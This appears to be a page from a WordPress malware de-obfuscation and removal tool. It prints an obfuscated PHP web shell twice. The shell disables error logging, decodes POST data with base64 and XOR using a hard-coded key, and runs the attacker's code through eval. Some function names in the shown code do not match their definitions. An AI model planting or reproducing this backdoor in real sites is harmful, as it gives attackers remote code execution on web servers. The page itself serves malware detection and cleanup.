De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3"; $GLOBALS["baa15"] = "chr"; $GLOBALS["hefaea"] = "ord"; $GLOBALS["b43ce01"] = "strlen"; $GLOBALS["o2dac69"] = "ini_set"; $GLOBALS["n800cc9"] = "json_decode"; $GLOBALS["o1471614"] = "base64_decode"; $GLOBALS["vd6dfc005"] = "set_time_limit"; $GLOBALS["q109b8"] = "c484"; $GLOBALS["z2a2c835b"] = "ae858b"; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); $k6de1cb3 = NULL; $v24368366 = NULL; function ae858b($k6de1cb3, $rbf8cd4) { $qc11 = ""; for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) { for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) { $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3])); } } return $qc11; } function c484($k6de1cb3, $rbf8cd4) { return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4); } if (!$k6de1cb3) { foreach ($_POST as $rbf8cd4 => $n18fd12d) { $k6de1cb3 = $n18fd12d; $v24368366 = $rbf8cd4; } } $k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true); if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) { if ($k6de1cb3["a"] == "&") { eval($k6de1cb3["L"]); } exit; }
<?php $GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3"; $GLOBALS["baa15"] = "chr"; $GLOBALS["hefaea"] = "ord"; $GLOBALS["b43ce01"] = "strlen"; $GLOBALS["o2dac69"] = "ini_set"; $GLOBALS["n800cc9"] = "json_decode"; $GLOBALS["o1471614"] = "base64_decode"; $GLOBALS["vd6dfc005"] = "set_time_limit"; $GLOBALS["q109b8"] = "c484"; $GLOBALS["z2a2c835b"] = "ae858b"; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); $k6de1cb3 = NULL; $v24368366 = NULL; function ae858b($k6de1cb3, $rbf8cd4) { $qc11 = ""; for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) { for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) { $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3])); } } return $qc11; } function c484($k6de1cb3, $rbf8cd4) { return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4); } if (!$k6de1cb3) { foreach ($_POST as $rbf8cd4 => $n18fd12d) { $k6de1cb3 = $n18fd12d; $v24368366 = $rbf8cd4; } } $k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true); if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) { if ($k6de1cb3["a"] == "&") { eval($k6de1cb3["L"]); } exit; }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.